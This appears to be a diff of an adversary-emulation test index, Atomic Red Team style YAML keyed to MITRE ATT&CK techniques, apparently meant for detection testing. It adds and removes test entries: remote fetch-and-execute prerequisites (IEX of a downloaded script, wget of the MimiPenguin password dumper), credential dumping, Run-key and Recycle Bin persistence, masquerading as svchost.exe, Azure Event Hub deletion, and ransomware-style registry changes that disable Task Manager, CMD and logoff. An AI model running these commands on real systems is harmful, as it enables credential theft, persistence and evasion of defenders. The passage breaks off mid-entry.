-          type: Path
-          default: PathToAtomicsFolder\T1003.001\bin\wce.exe
-        wce_url:
-          description: Path to download Windows Credential Editor zip file
-          type: Url
-          default: https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip
-      dependency_executor_name: powershell
-      dependencies:
-      - description: 'Windows Credential Editor must exist on disk at specified location
-          (#{wce_exe})
-
-'
-        prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
-          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1" -UseBasicParsing)
-          if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
-            Expand-Archive $zippath $parentpath\wce -Force
-            Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
-            Remove-Item $zippath, $parentpath\wce -Recurse
-          }
-      executor:
-        command: "#{wce_exe} -o #{output_file}\n"
-        cleanup_command: del "#{output_file}" >nul 2>&1
-        name: command_prompt
-        elevation_required: true
     - name: Dump LSASS.exe Memory using ProcDump
       auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
       description: |
@@ -6299,6 +6262,73 @@ credential-access:
         cleanup_command: 'rm -f "#{output_file}"
 
 '
+    - name: Capture Passwords with MimiPenguin
+      auto_generated_guid: a27418de-bdce-4ebd-b655-38f04842bf0c
+      description: "MimiPenguin is a tool inspired by MimiKatz that targets Linux
+        systems affected by CVE-2018-20781 (Ubuntu-based distros and certain versions
+        of GNOME Keyring). \nUpon successful execution on an affected system, MimiPenguin
+        will retrieve passwords from memory and output them to a specified file. \nSee
+        https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781. \nSee https://www.tecmint.com/mimipenguin-hack-login-passwords-of-linux-users/#:~:text=Mimipenguin%20is%20a%20free%20and,tested%20on%20various%20Linux%20distributions.\n"
+      supported_platforms:
+      - linux
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "/tmp/T1003.007Test3.txt"
+        MimiPenguin_Location:
+          description: Path of MimiPenguin script
+          type: Path
+          default: "/tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh"
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'MimiPenguin script must exist on disk at specified location
+          (#{MimiPenguin_Location})
+
+'
+        prereq_command: 'if [ -f "#{MimiPenguin_Location}" ]; then exit 0; else exit
+          1; fi;
+
+'
+        get_prereq_command: |
+          wget -O "/tmp/mimipenguin.tar.gz" https://github.com/huntergregal/mimipenguin/releases/download/2.0-release/mimipenguin_2.0-release.tar.gz
+          mkdir /tmp/mimipenguin
+          tar -xzvf "/tmp/mimipenguin.tar.gz" -C /tmp/mimipenguin
+      - description: 'Strings must be installed
+
+'
+        prereq_command: 'if [ -x "$(command -v strings --version)" ]; then exit 0;
+          else exit 1; fi;
+
+'
+        get_prereq_command: 'sudo apt-get -y install binutils
+
+'
+      - description: 'Python2 must be installed
+
+'
+        prereq_command: 'if [ -x "$(command -v python2 --version)" ]; then exit 0;
+          else exit 1; fi;
+
+'
+        get_prereq_command: "sudo apt-get -y install python2       \n"
+      - description: 'Libc-bin must be installed
+
+'
+        prereq_command: 'if [ -x "$(command -v ldd --version)" ]; then exit 0; else
+          exit 1; fi;
+
+'
+        get_prereq_command: "sudo apt-get -y install libc-bin        \n"
+      executor:
+        command: |
+          sudo #{MimiPenguin_Location} > #{output_file}
+          cat #{output_file}
+        cleanup_command: 'rm -f #{output_file} > /dev/null
+
+'
+        name: bash
+        elevation_required: true
   T1606.002:
     technique:
       external_references:
@@ -10171,7 +10201,7 @@ collection:
           1; fi
 
 '
-        get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat
+        get_prereq_command: 'sudo apt install graphicsmagick-imagemagick-compat
 
 '
       executor:
@@ -11604,7 +11634,25 @@ privilege-escalation:
       - 'Kernel: Kernel Module Load'
       - 'Driver: Driver Load'
       - 'Process: OS API Execution'
-    atomic_tests: []
+      identifier: T1547
+    atomic_tests:
+    - name: Add a driver
+      auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
+      description: 'Install a driver via pnputil.exe lolbin
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        driver_inf:
+          description: A built-in, already installed windows driver inf
+          type: Path
+          default: C:\Windows\INF\usbstor.inf
+      executor:
+        command: 'pnputil.exe /add-driver "#{driver_inf}"
+
+'
+        name: command_prompt
   T1037:
     technique:
       id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334
@@ -18119,6 +18167,44 @@ privilege-escalation:
           Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
         name: powershell
         elevation_required: true
+    - name: Add persistance via Recycle bin
+      auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
+      description: |
+        Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
+        User have to clic on the recycle bin to lauch the payload (here calc)
+      supported_platforms:
+      - windows
+      executor:
+        command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command"
+          /ve /d "calc.exe" /f
+        cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open"
+          /f
+        name: command_prompt
+    - name: SystemBC Malware-as-a-Service Registry
+      auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891
+      description: |
+        This Atomic will create a registry key called socks5_powershell for persistance access
+        https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
+      supported_platforms:
+      - windows
+      input_arguments:
+        reg_key_value:
+          description: Thing to Run
+          type: Path
+          default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
+        reg_key_path:
+          description: Path to registry key to update
+          type: Path
+          default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
+      executor:
+        command: |
+          $RunKey = "#{reg_key_path}"
+          Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
+        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell"
+          -Force -ErrorAction Ignore
+
+'
+        name: powershell
   T1134.005:
     technique:
       external_references:
@@ -25019,6 +25105,57 @@ defense-evasion:
         cleanup_command: "aws s3 rb s3://#{s3_bucket_name} --force \n"
         name: sh
         elevation_required: false
+    - name: Azure - Eventhub Deletion
+      auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719
+      description: |
+        Identifies an Event Hub deletion in Azure.
+        An Event Hub is an event processing service that ingests and processes large volumes of events and data.
+        An adversary may delete an Event Hub in an attempt to evade detection.
+        https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        event_hub_name:
+          description: Name of the eventhub
+          type: String
+          default: test_eventhub
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        name_space_name:
+          description: Name of the NameSpace
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+'
+        prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzureAD -Credential $creds
+          New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
+          Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
+        name: powershell
+        elevation_required: false
   T1600.002:
     technique:
       id: attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5
@@ -28385,6 +28522,23 @@ defense-evasion:
 
 '
         name: sh
+    - name: Hide Files Through Registry
+      auto_generated_guid: f650456b-bd49-4bc1-ae9d-271b5b9581e7
+      description: "Disable Show Hidden files switch in registry. This technique was
+        abused by several malware to hide their files from normal user.\nSee how this
+        trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx
+        \n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
+          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /f >nul 2>&1
+          reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
   T1564.002:
     technique:
       external_references:
@@ -31192,6 +31346,36 @@ defense-evasion:
         cleanup_command: |
           rm -f $HOME/.../sh
           rmdir $HOME/.../
+    - name: Masquerade as a built-in system executable
+      auto_generated_guid: 35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+      description: 'Launch an executable that attempts to masquerade as a legitimate
+        executable.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        executable_filepath:
+          description: File path where the generated executable will be dropped and
+            executed from. The filename should be the name of a built-in system utility.
+          type: String
+          default: "$Env:windir\\Temp\\svchost.exe"
+      executor:
+        command: |
+          Add-Type -TypeDefinition @'
+          public class Test {
+              public static void Main(string[] args) {
+                  System.Console.WriteLine("tweet, tweet");
+              }
+          }
+          '@ -OutputAssembly "#{executable_filepath}"
+
+          Start-Process -FilePath "#{executable_filepath}"
+        cleanup_command: 'Remove-Item -Path "#{executable_filepath}" -ErrorAction
+          Ignore
+
+'
+        name: powershell
   T1556:
     technique:
       external_references:
@@ -31556,9 +31740,473 @@ defense-evasion:
           cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
           cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f
         cleanup_command: |
-          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
-          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
-          reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f >nul 2>&1
+          reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f >nul 2>&1
+          reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: BlackByte Ransomware Registry Changes - Powershell
+      auto_generated_guid: 0b79c06f-c788-44a2-8630-d69051f1123d
+      description: |
+        This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+        The steps are as follows:
+        <ol>
+            <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+            <li>2. Enable OS to share network connections between different privilege levels</li>
+            <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+        </ol>
+        The registry keys and their respective values will be created upon successful execution.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+          New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+          New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+        cleanup_command: |
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force -ErrorAction Ignore
+          Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force -ErrorAction Ignore
+          Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force -ErrorAction Ignore
+        name: powershell
+        elevation_required: true
+    - name: Disable Windows Registry Tool
+      auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
+        See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\policies\system
+          /v DisableRegistryTools /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'powershell Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\policies\system"
+          -Name DisableRegistryTools -ErrorAction Ignore
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows CMD application
+      auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
+        See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+      supported_platforms:
+      - windows
+      executor:
+        command: 'New-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System"
+          -Name DisableCMD -Value 1
+
+'
+        cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\System"
+          -Name DisableCMD -ErrorAction Ignore
+
+'
+        name: powershell
+        elevation_required: true
+    - name: Disable Windows Task Manager application
+      auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
+        See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableTaskmgr /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableTaskmgr /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Notification Center
+      auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
+        See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer
+          /v DisableNotificationCenter /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer
+          /v DisableNotificationCenter /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Shutdown Button
+      auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
+        See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v shutdownwithoutlogon /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows LogOff Button
+      auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
+        See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /t REG_DWORD /d 1 /f
+          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+        cleanup_command: |
+          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogOff /f >nul 2>&1
+          reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Change Password Feature
+      auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
+        See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableChangePassword /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableChangePassword /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Disable Windows Lock Workstation Feature
+      auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
+        See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableLockWorkstation /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
+          /v DisableLockWorkstation /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoDesktop Group Policy Feature
+      auto_generated_guid: 93386d41-525c-4a1b-8235-134a628dee17
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to hide all icons on Desktop Group Policy. \nTake note that
+        some Group Policy changes might require a restart to take effect.\nSee how
+        Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoDesktop /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoDesktop /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoRun Group Policy Feature
+      auto_generated_guid: d49ff3cc-8168-4123-b5b3-f057d9abbd55
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy.
+        Take note that some Group Policy changes might require a restart to take effect.
+        See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoRun /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\"
+          /v NoRun /f \n"
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoFind Group Policy Feature
+      auto_generated_guid: ffbb407e-7f1d-4c95-b22e-548169db1fbd
+      description: |
+        Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy.
+        Take note that some Group Policy changes might require a restart to take effect.
+        See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoFind /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoFind /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoControlPanel Group Policy Feature
+      auto_generated_guid: a450e469-ba54-4de1-9deb-9023a6111690
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to Disable Control Panel Group Policy. \nTake note that some
+        Group Policy changes might require a restart to take effect.\nSee how Trojan
+        abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoControlPanel /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoControlPanel /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoFileMenu Group Policy Feature
+      auto_generated_guid: 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to Remove File menu from Windows Explorer Group Policy. \nTake
+        note that some Group Policy changes might require a restart to take effect.\nSee
+        how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoFileMenu /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoFileMenu /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoClose Group Policy Feature
+      auto_generated_guid: 12f50e15-dbc6-478b-a801-a746e8ba1723
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to Disable and remove the Shut Down command Group Policy.
+        \nTake note that some Group Policy changes might require a restart to take
+        effect.\nSee how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoClose /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoClose /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoSetTaskbar Group Policy Feature
+      auto_generated_guid: d29b7faf-7355-4036-9ed3-719bd17951ed
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to Disable changes to Taskbar and Start Menu Settings Group
+        Policy. \nTake note that some Group Policy changes might require a restart
+        to take effect.\nSee how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoSetTaskbar /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoSetTaskbar /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoTrayContextMenu Group Policy Feature
+      auto_generated_guid: 4d72d4b1-fa7b-4374-b423-0fe326da49d2
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to Disable context menu for taskbar Group Policy. \nTake note
+        that some Group Policy changes might require a restart to take effect.\nSee
+        how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoTrayContextMenu /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoTrayContextMenu /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Activate Windows NoPropertiesMyDocuments Group Policy Feature
+      auto_generated_guid: 20fc9daa-bd48-4325-9aff-81b967a84b1d
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to hide Properties from \"My Documents icon\" Group Policy.
+        \nTake note that some Group Policy changes might require a restart to take
+        effect.\nSee how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\"
+          /v NoPropertiesMyDocuments /t REG_DWORD /d 1 \n"
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v NoPropertiesMyDocuments /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Hide Windows Clock Group Policy Feature
+      auto_generated_guid: 8023db1e-ad06-4966-934b-b6a0ae52689e
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to Hide Clock Group Policy. \nTake note that some Group Policy
+        changes might require a restart to take effect.\nSee how ransomware abuses
+        this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideClock /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideClock /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Windows HideSCAHealth Group Policy Feature
+      auto_generated_guid: a4637291-40b1-4a96-8c82-b28f1d73e54e
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to remove security and maintenance icon Group Policy. \nTake
+        note that some Group Policy changes might require a restart to take effect.\nSee
+        how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCAHealth /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
+          /v HideSCAHealth /f >nul 2>&1
+
+'
+        name: command_prompt
+        elevation_required: true
+    - name: Windows HideSCANetwork Group Policy Feature
+      auto_generated_guid: 3e757ce7-eca0-411a-9583-1c33b8508d52
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to remove the networking icon Group Policy. \nTake note that
+        some Group Policy changes might require a restart to take effect.\nSee how
